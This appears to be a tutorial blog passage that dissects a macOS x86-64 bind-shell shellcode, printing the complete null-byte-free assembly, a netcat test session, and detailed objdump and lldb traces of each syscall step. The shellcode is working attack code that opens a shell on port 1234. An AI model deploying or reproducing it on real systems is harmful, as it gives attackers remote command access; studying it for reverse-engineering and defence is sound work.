Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In the last article, Some more shellcode, I showed some basic static and dynamic binary analysis using Hopper.
In this article, we accomplish a more complex task: we want to create some code that binds a shell.
Binding a Shell
This is the wet dream of all hackers - and conversely, it is the nightmare of all blue teamers. This shellcode opens a shell that can be reached via netcat on port 1234.
The code
We start from the code:
; 91 bytes bind shell
;
bits 64
global _main
_main:
mov eax, ~0xd2040200 & 0xFFFFFFFF
not eax
push rax
xor ebp, ebp
bts ebp, 25
; step 1, create a socket
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push rbp
pop rax ; rax = 0x02000000
cdq ; rdx = IPPROTO_IP
push 1
pop rsi ; rsi = SOCK_STREAM
push 2
pop rdi ; rdi = AF_INET
mov al, 97 ; eax = sys_socket
syscall
xchg eax, edi ; edi=s
xchg eax, ebx ; ebx=2
; step 2, bind to port 1234
; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
push rbp
pop rax
push rsp
pop rsi
mov dl, 16
mov al, 104
syscall
; step 3, listen
; listen(s, 0);
push rax
pop rsi
push rbp
pop rax
mov al, 106
syscall
; step 4, accept connections
; accept(s, 0, 0);
push rbp
pop rax
mov al, 30
cdq
syscall
xchg eax, edi ; edi=r
push rbx ; rsi=2
pop rsi
; step 5, assign socket handle to stdin,stdout,stderr
; dup2(r, FILENO_STDIN)
; dup2(r, FILENO_STDOUT)
; dup2(r, FILENO_STDERR)
dup_loop64:
push rbp
pop rax
mov al, 90 ; rax=sys_dup2
syscall
sub esi, 1
jns dup_loop64 ; loop while esi >= 0 (sign flag clear)
; step 6, execute /bin/zsh
; execve("/bin/zsh", NULL, NULL);
xor esi, esi
cdq ; rdx=0
mov rbx, '/bin/zsh'
push rdx ; 0
push rbx ; "/bin/zsh"
push rsp
pop rdi ; rdi -> "/bin/zsh", 0
; ---------
push rbp
pop rax
mov al, 59 ; rax=sys_execve
syscall
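The only detail that's been changed from the original code is the chosen shell. We opted for zsh because Apple made it the default shell on macOS, starting with Catalina. The original shell was /bin//sh (observe the double slash: it pads the path to exactly eight bytes, so that the whole string fits in one 64-bit register with no null byte; /bin/zsh happens to be eight bytes long too).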
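To make the padding argument concrete, the sketch below packs an eight-character path into a 64-bit value with the first character in the least significant byte, which is how NASM encodes a character constant such as '/bin/zsh' for mov rbx. The helper names pack8 and has_no_null_byte are hypothetical, chosen for illustration; the expected value for /bin//sh is the one lldb shows for the movabs instruction later in this article.

```c
#include <stdint.h>

/* Hypothetical helper: pack exactly 8 characters into a 64-bit value the
 * way NASM encodes a character constant such as '/bin/zsh': the first
 * character ends up in the least significant byte (little-endian). */
uint64_t pack8(const char *s)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; --i)
        v = (v << 8) | (unsigned char)s[i];
    return v;
}

/* Hypothetical helper: returns 1 if none of the 8 bytes of v is zero. */
int has_no_null_byte(uint64_t v)
{
    for (int i = 0; i < 8; ++i)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 0;
    return 1;
}
```

A seven-character path such as /bin/sh would leave its terminator in the top byte of the register, which is exactly the null byte the double slash avoids.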
Running the code
In a terminal, I launch:
gbiondo@tripleX Odzhan % ./bindshell
(no output is produced)
In another terminal, I launch:
gbiondo@tripleX shellcode2 % nc localhost 1234
pwd
/Users/gbiondo/EXP312/Odzhan
time
real 0m0.001s
user 0m0.000s
sys 0m0.000s
date
Wed Apr 13 14:52:30 BST 2022
echo $SHELL
/bin/zsh
whoami
gbiondo
Try to imagine: the software you are running opens a shell that is reachable from the outside. This is very dangerous.
Some static binary analysis
file
gbiondo@tripleX Odzhan % file bindshell
bindshell: Mach-O 64-bit executable x86_64
Nothing we didn't know before, actually.
Symbol Table
gbiondo@tripleX Odzhan % objdump -m -t bindshell
bindshell:
SYMBOL TABLE:
0000000100003f96 l F __TEXT,__text dup_loop64
0000000100000000 g *ABS* __mh_execute_header
0000000100003f5d g F __TEXT,__text _main
Nothing too interesting, actually.
Section headers
gbiondo@tripleX Odzhan % objdump -m -h bindshell
Sections:
Idx Name Size VMA Type
0 __text 0000005b 0000000100003f5d TEXT
1 __unwind_info 00000048 0000000100003fb8 DATA
Also this one is not too talkative :)
Null-byte sanitization
Before doing anything else, we subdivide the code into logical blocks, named as follows:
- preamble: the code before the comment ; step 1, create a socket
- socket: the code between ; step 1, create a socket and ; step 2, bind to port 1234
- bind: the code between ; step 2, bind to port 1234 and ; step 3, listen
- listen: the code between ; step 3, listen and ; step 4, accept connections
- accept connections: the code between ; step 4, accept connections and ; step 5, assign socket handle to stdin,stdout,stderr
- handle management: the code between ; step 5, assign socket handle to stdin,stdout,stderr and ; step 6, execute /bin/zsh
- shell execution: the rest of the code
For reasons that will become evident later on, we need null-byte-free code. A null byte is simply a byte whose value is 0x00. An example explains the situation better: if we look at the opcodes in the disassembled object file of cmdRun, the program we used in Some more shellcode, in the subroutine <l_cmd64> we see:
gbiondo@tripleX Odzhan % objdump -D -M intel cmdRun.o
cmdRun.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
--8< --8< --8< SNIP --8< --8< --8<
0000000000000026 <l_cmd64>:
26: e8 f5 ff ff ff call 0x20 <r_cmd64>
2b: 63 61 74 movsxd esp, dword ptr [rcx + 116]
2e: 20 2f and byte ptr [rdi], ch
30: 65 74 63 je 0x96 <l_cmd64+0x70>
33: 2f <unknown>
34: 70 61 jo 0x97 <l_cmd64+0x71>
36: 73 73 jae 0xab <l_cmd64+0x85>
38: 77 64 ja 0x9e <l_cmd64+0x78>
3a: 00 <unknown>
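The byte at 0x3a is 00. The bytes from 0x2b onwards are not really instructions: they are the string "cat /etc/passwd", which objdump decodes as if it were code, and the 00 is its terminator. There it is acceptable because of the structure of the program, but in general, we want to avoid these bytes.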
So, now we want to check whether there are any null bytes in the opcodes.
We do it part by part.
Preamble
This part is null-byte free:
gbiondo@tripleX bindshell_files % nasm -f macho64 preamble.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel preamble.o
preamble.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <_main>:
0: b8 ff fd fb 2d mov eax, 771489279
5: f7 d0 not eax
7: 50 push rax
8: 31 ed xor ebp, ebp
a: 0f ba ed 19 bts ebp, 25
Socket
Also this part is null-byte free:
gbiondo@tripleX bindshell_files % nasm -f macho64 socket.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel socket.o
socket.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: 99 cdq
3: 6a 01 push 1
5: 5e pop rsi
6: 6a 02 push 2
8: 5f pop rdi
9: b0 61 mov al, 97
b: 0f 05 syscall
d: 97 xchg eax, edi
e: 93 xchg eax, ebx
Bind
Another part with no null-bytes:
gbiondo@tripleX bindshell_files % nasm -f macho64 bind.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel bind.o
bind.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: 54 push rsp
3: 5e pop rsi
4: b2 10 mov dl, 16
6: b0 68 mov al, 104
8: 0f 05 syscall
Listen
No null-bytes here...
gbiondo@tripleX bindshell_files % nasm -f macho64 listen.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel listen.o
listen.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 50 push rax
1: 5e pop rsi
2: 55 push rbp
3: 58 pop rax
4: b0 6a mov al, 106
6: 0f 05 syscall
Accept connections
... nor here. Bo-ring!
gbiondo@tripleX bindshell_files % nasm -f macho64 acceptConnections.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel acceptConnections.o
acceptConnections.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: b0 1e mov al, 30
4: 99 cdq
5: 0f 05 syscall
7: 97 xchg eax, edi
8: 53 push rbx
9: 5e pop rsi
Handle management
Ibid
gbiondo@tripleX bindshell_files % nasm -f macho64 handleManagement.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel handleManagement.o
handleManagement.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <dup_loop64>:
0: 55 push rbp
1: 58 pop rax
2: b0 5a mov al, 90
4: 0f 05 syscall
6: 83 ee 01 sub esi, 1
9: 79 f5 jns 0x0 <dup_loop64>
Shell execution
Ibid
gbiondo@tripleX bindshell_files % nasm -f macho64 shell.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel shell.o
shell.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 31 f6 xor esi, esi
2: 99 cdq
3: 48 bb 2f 62 69 6e 2f 2f 73 68 movabs rbx, 7526411283028599343
d: 52 push rdx
e: 53 push rbx
f: 54 push rsp
10: 5f pop rdi
11: 55 push rbp
12: 58 pop rax
13: b0 3b mov al, 59
15: 0f 05 syscall
Commentary
All these pieces of code are null-byte free on purpose: the original author wrote the code this way because he wanted portable shellcode.
In a subsequent article, I will explain some techniques that can be used to obtain clean shellcode. For the moment, the objective of this part of the article was to show this step of shellcode development.
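The per-block checks above can also be run in one pass over the whole payload. The sketch below is a hypothetical helper, not part of the original toolchain: it hard-codes the 91 bytes transcribed from the objdump listings in this section (so the string is still /bin//sh, as in shell.o) and returns the offset of the first 0x00 byte, or -1 if there is none.

```c
#include <stddef.h>

/* The 91 bytes of the bind shell, transcribed block by block from the
 * objdump listings above (shell.o still contains "/bin//sh"). */
static const unsigned char bindshell[] = {
    /* preamble */
    0xb8, 0xff, 0xfd, 0xfb, 0x2d, 0xf7, 0xd0, 0x50, 0x31, 0xed,
    0x0f, 0xba, 0xed, 0x19,
    /* socket */
    0x55, 0x58, 0x99, 0x6a, 0x01, 0x5e, 0x6a, 0x02, 0x5f, 0xb0,
    0x61, 0x0f, 0x05, 0x97, 0x93,
    /* bind */
    0x55, 0x58, 0x54, 0x5e, 0xb2, 0x10, 0xb0, 0x68, 0x0f, 0x05,
    /* listen */
    0x50, 0x5e, 0x55, 0x58, 0xb0, 0x6a, 0x0f, 0x05,
    /* accept connections */
    0x55, 0x58, 0xb0, 0x1e, 0x99, 0x0f, 0x05, 0x97, 0x53, 0x5e,
    /* handle management (dup_loop64) */
    0x55, 0x58, 0xb0, 0x5a, 0x0f, 0x05, 0x83, 0xee, 0x01, 0x79,
    0xf5,
    /* shell execution */
    0x31, 0xf6, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
    0x2f, 0x73, 0x68, 0x52, 0x53, 0x54, 0x5f, 0x55, 0x58, 0xb0,
    0x3b, 0x0f, 0x05,
};

/* Hypothetical helper: offset of the first zero byte in buf, or -1. */
long find_null_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; ++i)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}
```

Fed the last three bytes of the cmdRun listing (77 64 00), the same helper returns 2.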
Dynamic binary analysis
Here too, we can use the taxonomy defined above to keep the structure a bit more readable.
If not done yet, we start by assembling and linking the executable. The last command loads it into lldb.
gbiondo@tripleX bindshell_files % nasm -f macho64 bindshell.asm
gbiondo@tripleX bindshell_files % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem bindshell.o -o bindshell
gbiondo@tripleX bindshell_files % lldb bindshell
We set a breakpoint in the main subroutine, and we're ready to go.
(lldb) breakpoint set -n main
Breakpoint 1: where = bindshell`main, address = 0x0000000100003f5d
Preamble
The preamble disassembled code is as follows:
bindshell[0x100003f5d] <+0>: mov eax, 0x2dfbfdff
bindshell[0x100003f62] <+5>: not eax
bindshell[0x100003f64] <+7>: push rax
bindshell[0x100003f65] <+8>: xor ebp, ebp
bindshell[0x100003f67] <+10>: bts ebp, 0x19
The readers should be familiar with the mov instruction by now, so I am not going to explain it. On the other hand, it is interesting to understand how ~0xd2040200 & 0xFFFFFFFF becomes 0x2dfbfdff.
The & operator performs a bitwise AND. Since FF is all ones, the neutral element of the & operation, the mask leaves the lower 32 bits untouched; its only job is to clear the upper 32 bits. NASM evaluates expressions with 64-bit integers, so ~0xd2040200 on its own would be 0xFFFFFFFF2DFBFDFF, which does not fit in the 32-bit immediate of mov eax.
The tilde ~ operator inverts every bit. I have prepared an image that explains how the operation went here - a picture is worth more than a thousand words, after all...
We start the process and begin debugging. Before the execution of the instruction at <+0> we have:
(lldb) register read RAX EAX
rax = 0x0000000100074010 dyld`dyld4::sConfigBuffer
eax = 0x00074010
and after it, obviously, we obtain:
(lldb) register read RAX EAX
rax = 0x000000002dfbfdff
eax = 0x2dfbfdff
Now the following instruction (at <+5>) is a NOT, and after its execution, we have:
(lldb) register read RAX EAX RSP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff818
Unsurprisingly! NOT is involutory! This has all been done in order to avoid storing null bytes.
The next instruction (<+7>) stores the contents of RAX on the stack (so, at the address 0x00007ff7bfeff810):
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff810
ebp = 0xbfeff920
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
With the next instruction (<+8>) the contents of ebp are zeroed, and with the one after (<+10>) bit 25 (counting from 0) is set to 1:
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
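The resulting value, 0x02000000, is the prefix macOS uses for BSD system-call numbers (the BSD syscall class). RBP keeps it as a template that every later block copies into RAX before writing the actual syscall number into AL. This closes the analysis of the first chunk.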
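Every later block repeats the same pattern (push rbp; pop rax; mov al, N). The sketch below models only the resulting register values, not the instructions themselves; the function and enum names are hypothetical, and the syscall numbers are the ones looked up in syscalls.master in this article.

```c
#include <stdint.h>

/* xor ebp, ebp; bts ebp, 25 -> 0x02000000 (BSD syscall class prefix). */
uint32_t bsd_class_prefix(void)
{
    uint32_t ebp = 0;          /* xor ebp, ebp */
    ebp |= UINT32_C(1) << 25;  /* bts ebp, 25  */
    return ebp;
}

/* push rbp; pop rax; mov al, nr: copy the prefix, then overwrite only
 * the lowest byte with the syscall number. */
uint64_t syscall_rax(uint64_t rbp, uint8_t nr)
{
    uint64_t rax = rbp;                  /* push rbp; pop rax */
    rax = (rax & ~UINT64_C(0xff)) | nr;  /* mov al, nr        */
    return rax;
}

/* Syscall numbers used by the shellcode (from syscalls.master). */
enum {
    NR_ACCEPT = 30, NR_EXECVE = 59, NR_DUP2 = 90,
    NR_SOCKET = 97, NR_BIND = 104, NR_LISTEN = 106
};
```

The trick only works because every syscall number used by this shellcode fits in a single byte, so writing AL is enough.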
Socket
The disassembled code for Socket is:
0x100003f6b <+14>: push rbp
0x100003f6c <+15>: pop rax
0x100003f6d <+16>: cdq
0x100003f6e <+17>: push 0x1
0x100003f70 <+19>: pop rsi
0x100003f71 <+20>: push 0x2
0x100003f73 <+22>: pop rdi
0x100003f74 <+23>: mov al, 0x61
0x100003f76 <+25>: syscall
0x100003f78 <+27>: xchg eax, edi
0x100003f79 <+28>: xchg eax, ebx
The contents of rbp are pushed onto the stack (instruction <+14>) and then popped into rax (instruction <+15>).
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff808
ebp = 0x02000000
(lldb) memory read $rsp
0x7ff7bfeff808: 00 00 00 02 00 00 00 00 00 02 04 d2 00 00 00 00 ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
and after instruction <+15>
(lldb) register read RAX EAX RSP EBP
rax = 0x0000000002000000
eax = 0x02000000
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
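Now, we have already seen the CDQ instruction (convert doubleword to quadword). It sign-extends EAX into EDX: every bit of EDX becomes a copy of bit 31 of EAX, while EAX itself is left unchanged. Since EAX is positive here, EDX is zeroed, and because a 32-bit write also clears the upper half of the 64-bit register, so is RDX. Before instruction <+16> we have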
(lldb) register read RSP EBP DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
dx = 0xf958
ax = 0x0000
edx = 0xbfeff958
eax = 0x02000000
rdx = 0x00007ff7bfeff958
rax = 0x0000000002000000
and after it, we have
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
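Since 0x02000000, and every value later built from it, keeps bit 31 clear, cdq is a one-byte way of zeroing RDX. The sketch below models just that effect; cdq_rdx is a hypothetical name.

```c
#include <stdint.h>

/* cdq: EDX = 0xFFFFFFFF if bit 31 of EAX is set, 0 otherwise.
 * EAX is not modified; the 32-bit write to EDX zero-extends into RDX. */
uint64_t cdq_rdx(uint32_t eax)
{
    uint32_t edx = (eax & UINT32_C(0x80000000)) ? UINT32_C(0xFFFFFFFF) : 0;
    return (uint64_t)edx;
}
```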
Then 1 is pushed onto the stack (instruction <+17>):
(lldb) memory read $rsp
0x7ff7bfeff808: 01 00 00 00 00 00 00 00 00 02 04 d2 00 00 00 00 ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff808
ebp = 0x02000000
rsi = 0x00007ff7bfeff948
rdi = 0x0000000000000001
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
and popped back into rsi (instruction <+19>).
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
rsi = 0x0000000000000001
rdi = 0x0000000000000001
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Similarly, the instructions <+20> and <+22> store the value 2 in rdi, leading to the following situation:
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
rsi = 0x0000000000000001
rdi = 0x0000000000000002
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
The very next instruction (<+23>) moves 0x61 into the lowest 8 bits of eax. 0x61 in decimal is 97. If we look in the syscalls.master file, we immediately notice that this is the number associated with the socket syscall.
Now, man 2 socket gives the description of the call, which in C is declared as follows:
#include <sys/socket.h>
int
socket(int domain, int type, int protocol);
In short, socket() creates an endpoint for communication and returns a descriptor.
In the man page, we find the description of the parameters:
The domain parameter specifies a communications domain within which communication will take place; this selects the protocol family which should be used.
These families are defined in the include file ⟨sys/socket.h⟩. The currently understood formats are:
PF_LOCAL Host-internal protocols, formerly called PF_UNIX,
PF_UNIX Host-internal protocols, deprecated, use PF_LOCAL,
PF_INET Internet version 4 protocols,
PF_ROUTE Internal Routing protocol,
PF_KEY Internal key-management function,
PF_INET6 Internet version 6 protocols,
PF_SYSTEM System domain,
PF_NDRV Raw access to network device,
PF_VSOCK VM Sockets protocols
The socket has the indicated type, which specifies the semantics of communication. Currently defined types are:
SOCK_STREAM
SOCK_DGRAM
SOCK_RAW
A SOCK_STREAM type provides sequenced, reliable, two-way connection based byte streams. An out-of-band data transmission mechanism may be supported. A SOCK_DGRAM socket supports datagrams (connectionless, unreliable messages of a fixed (typically small) maximum length). SOCK_RAW sockets provide access to internal network protocols and interfaces. The type SOCK_RAW, which is available only to the super-user.
The protocol specifies a particular protocol to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family. However, it is possible that many protocols may exist, in which case a particular protocol must be specified in this manner. The protocol number to use is particular to the “communication domain” in which communication is to take place; see protocols(5).
To understand what the author originally wanted to achieve, let's take a look at the code.
The original call to the socket() API was intended to be:
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
In socket.h we find the definition of AF_INET as follows:
#define AF_INET 2 /* internetwork: UDP, TCP, etc. */
The same header defines PF_INET as AF_INET, so in this case the two constants are interchangeable.
The author wants a TCP connection, so he decided to use SOCK_STREAM, which is also defined in socket.h:
#define SOCK_STREAM 1 /* stream socket */
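Finally, the third parameter is IPPROTO_IP, i.e. 0: a protocol number of zero asks the kernel for the default protocol of the chosen domain and type, which for an AF_INET SOCK_STREAM socket is TCP. IPPROTO_IP is defined in the in.h header: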
#define IPPROTO_IP 0 /* dummy for IP */
To recap, the call should be invoked as:
socket(2,1,0)
so:
Param. no. | Register | Required value |
---|---|---|
1 | RDI | AF_INET = 2 |
2 | RSI | SOCK_STREAM = 1 |
3 | RDX | IPPROTO_IP = 0 |
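For comparison, step 1 written directly against the C API is a single call. This is a sketch (open_tcp_socket is a hypothetical name); the constants come from the headers quoted above and have the same values on macOS and Linux.

```c
#include <netinet/in.h>   /* IPPROTO_IP */
#include <sys/socket.h>   /* socket, AF_INET, SOCK_STREAM */
#include <unistd.h>       /* close */

/* C equivalent of step 1: socket(AF_INET, SOCK_STREAM, IPPROTO_IP),
 * i.e. socket(2, 1, 0). Returns the new descriptor, or -1 on error. */
int open_tcp_socket(void)
{
    return socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
}
```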
Taking a look at the last status of the registers, we see that the program is ready to invoke the socket syscall.
Let's review the contents of the registers before and after the syscall:
Register | Before | After |
---|---|---|
RAX | 0x0000000002000061 | 0x0000000000000003 |
RBX | 0x00000001000c0060 | 0x00000001000c0060 |
RCX | 0x00007ff7bfeffa80 | 0x0000000100003f78 |
RDX | 0x0000000000000000 | 0x0000000000000000 |
RDI | 0x0000000000000002 | 0x0000000000000002 |
RSI | 0x0000000000000001 | 0x0000000000000001 |
RBP | 0x0000000002000000 | 0x0000000002000000 |
RSP | 0x00007ff7bfeff870 | 0x00007ff7bfeff870 |
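We observe that the values of RAX and RCX have changed. RAX contains the return value of socket, which is a file descriptor (3). RCX is clobbered by the syscall instruction itself, which saves the return address there: 0x0000000100003f78 is exactly the address of the instruction that follows the syscall (<+27>).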
The Socket part finishes with the two XCHG instructions (<+27> and <+28>). The XCHG instruction exchanges the contents of a register with the contents of another register or of a memory location; it cannot exchange the contents of two memory locations directly.
The effects of these two instructions are:
- with the first one, the values of eax and edi are swapped;
- with the second one, the values of eax (the former value of edi) and ebx are swapped.
Because these are 32-bit operations, the upper halves of the 64-bit registers are cleared: this is why RAX ends up as 0x00000000000c0060 rather than 0x00000001000c0060.
In short, we have:
Register | Before | After |
---|---|---|
RAX | 0x0000000000000003 | 0x00000000000c0060 |
RBX | 0x00000001000c0060 | 0x0000000000000002 |
RDI | 0x0000000000000002 | 0x0000000000000003 |
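The register table above can be reproduced with a small model of a 32-bit xchg. In this sketch, xchg32 is a hypothetical helper that swaps the low halves of two 64-bit values and clears the upper halves, as a 32-bit register write does in 64-bit mode; it ignores the special case of xchg eax, eax, which is a plain nop.

```c
#include <stdint.h>

/* xchg r32, r32: swap the low 32 bits of two registers; both
 * destinations are zero-extended to 64 bits. */
void xchg32(uint64_t *a, uint64_t *b)
{
    uint32_t lo_a = (uint32_t)*a;
    uint32_t lo_b = (uint32_t)*b;
    *a = lo_b;
    *b = lo_a;
}
```

Starting from RAX = 3, RBX = 0x00000001000c0060 and RDI = 2, calling xchg32 on (RAX, RDI) and then on (RAX, RBX) yields the "After" column.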
Bind
This part is quite complex. The assembled code is not very different from the original - in fact, we have:
0x100003f7a <+29>: push rbp
0x100003f7b <+30>: pop rax
0x100003f7c <+31>: push rsp
0x100003f7d <+32>: pop rsi
0x100003f7e <+33>: mov dl, 0x10
0x100003f80 <+35>: mov al, 0x68
0x100003f82 <+37>: syscall
Whilst the pushes and the pops look quite familiar, the mov instructions deserve some analysis.
The effect of the first two instructions is copying the contents of rbp into rax, and the effect of the third and fourth instructions is copying the contents of rsp into rsi. With the first instruction (<+29>), the value of RBP is pushed onto the stack, and with the next one it is popped into the RAX register. It's worth remembering that, before this code is executed, RBP contains 0x0000000002000000. As for RSI: all the push/pop pairs executed since the preamble are balanced, so RSP still points at the eight bytes pushed at <+7> (0x00000000d2040200), and RSI becomes a pointer to them. As we will see shortly, those bytes are the beginning of the address structure passed to bind().
Before going any further, we observe that the code sets the lowest 8 bits of rax (this is what al is) to 0x68, or 104 in decimal. This is the number of the syscall that will be called. A quick look in the syscalls.master file shows that this is the syscall:
104 AUE_BIND ALL { int bind(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; }
so we know we need to invoke man 2 bind from the terminal to get some more information on the API. In this case, we have:
#include <sys/socket.h>
int bind(int socket, const struct sockaddr *address, socklen_t address_len);
bind() assigns a name to an unnamed socket. When a socket is created with socket(2) it exists in a name space (address family) but has no name assigned. bind() requests that address be assigned to the socket.
The second parameter to this call is a pointer to a struct sockaddr, and the third is basically an integer containing the length of that structure.
We need to do some reverse engineering of the Apple XNU code, now.
For AF_INET sockets, the structure actually passed is struct sockaddr_in, which is described in the file in.h:
struct sockaddr_in {
__uint8_t sin_len;
sa_family_t sin_family;
in_port_t sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
In order to find the third parameter, we need to determine the sizes of all types. In the same file, we immediately find
struct in_addr {
in_addr_t s_addr;
};
so we need to give a size to the following types:
Data type | Defined in |
---|---|
sa_family_t | _sa_family_t.h |
in_port_t | _in_port_t.h |
in_addr | in.h |
To speed up things, we wrote a little program to find the sizes of the integer types:
#include <iostream>
#include <inttypes.h>
using namespace std;
int main ()
{
cout << "sizeof size_t type is: " << sizeof(size_t) << " bytes\n";
cout << "sizeof char type is: " << sizeof(char) << " bytes\n";
cout << "sizeof uint8_t type is: " << sizeof(uint8_t) << " bytes\n";
cout << "sizeof __uint8_t type is: " << sizeof(__uint8_t) << " bytes\n";
cout << "sizeof uint16_t type is: " << sizeof(uint16_t) << " bytes\n";
cout << "sizeof __uint16_t type is: " << sizeof(__uint16_t) << " bytes\n";
cout << "sizeof uint32_t type is: " << sizeof(uint32_t) << " bytes\n";
cout << "sizeof __uint32_t type is: " << sizeof(__uint32_t) << " bytes\n";
cout << "sizeof uint64_t type is: " << sizeof(uint64_t) << " bytes\n";
cout << "sizeof __uint64_t type is: " << sizeof(__uint64_t) << " bytes\n";
return 0;
}
Running it gives us:
sizeof size_t type is: 8 bytes
sizeof char type is: 1 bytes
sizeof uint8_t type is: 1 bytes
sizeof __uint8_t type is: 1 bytes
sizeof uint16_t type is: 2 bytes
sizeof __uint16_t type is: 2 bytes
sizeof uint32_t type is: 4 bytes
sizeof __uint32_t type is: 4 bytes
sizeof uint64_t type is: 8 bytes
sizeof __uint64_t type is: 8 bytes
So, let's enrich the previous table:
Data type | Defined in | Aliases | Size |
---|---|---|---|
char | n/a | n/a | 1 byte |
uint8_t | n/a | unsigned char | 1 byte |
sa_family_t | _sa_family_t.h | __uint8_t | 1 byte |
in_port_t | _in_port_t.h | __uint16_t | 2 bytes |
in_addr | in.h | in_addr_t | n/a |
in_addr_t | _in_addr_t.h | __uint32_t | 4 bytes |
To summarise, the struct sockaddr_in has the following field sizes:
struct sockaddr_in {
__uint8_t sin_len; //1 byte
sa_family_t sin_family; //1 byte
in_port_t sin_port; //2 bytes
struct in_addr sin_addr; //4 bytes
char sin_zero[8]; //8 bytes
};
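The hand-computed sizes can be checked by the compiler. The sketch below uses C11 _Static_assert with offsetof; sockaddr_in_size is a hypothetical helper. The checks on sin_len and sin_family are guarded by __APPLE__ because sin_len only exists on BSD-derived systems such as macOS: on Linux sin_family is a 2-byte field, yet sin_port and sin_addr still sit at offsets 2 and 4.

```c
#include <stddef.h>       /* offsetof, size_t */
#include <netinet/in.h>   /* struct sockaddr_in */

/* Compile-time checks of the layout computed by hand above. */
_Static_assert(sizeof(struct sockaddr_in) == 16, "16 bytes in total");
_Static_assert(offsetof(struct sockaddr_in, sin_port) == 2, "port at 2");
_Static_assert(offsetof(struct sockaddr_in, sin_addr) == 4, "address at 4");
_Static_assert(offsetof(struct sockaddr_in, sin_zero) == 8, "padding at 8");
#ifdef __APPLE__
_Static_assert(offsetof(struct sockaddr_in, sin_len) == 0, "length at 0");
_Static_assert(offsetof(struct sockaddr_in, sin_family) == 1, "family at 1");
#endif

size_t sockaddr_in_size(void)
{
    return sizeof(struct sockaddr_in);
}
```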
In short, this structure is 16 bytes long. We can represent it graphically as follows:
At this point, the situation is as follows:
Param. no. | Register | Value |
---|---|---|
1 | RDI | 0x0000000000000003 |
2 | RSI | 0x00007ff7bfeff870 |
3 | RDX | 0x0000000000000000 |
Let's go back to the code. The effect of the instruction <+33> is to load 0x10 = 16 into the lowest 8 bits of rdx, thus setting the third parameter (the size) of the bind() call.
In a similar way, the instruction <+35> prepares the syscall by finalising its number.
In short, we have:
rdi = 0x0000000000000003
rsi = 0x00007ff7bfeff870
rdx = 0x0000000000000010
rax = 0x0000000002000068
Now it's interesting to see the values of the structure. Let's dump the stack from 16 bytes below rsi to 16 bytes above it; the structure occupies the 16 bytes starting at rsi:
(lldb) register read rsi
rsi = 0x00007ff7bfeff870
(lldb) memory read $rsi-0x10 $rsi+0x10
0x7ff7bfeff860: 14 00 00 00 00 00 00 00 70 f8 ef bf f7 7f 00 00 ........p.......
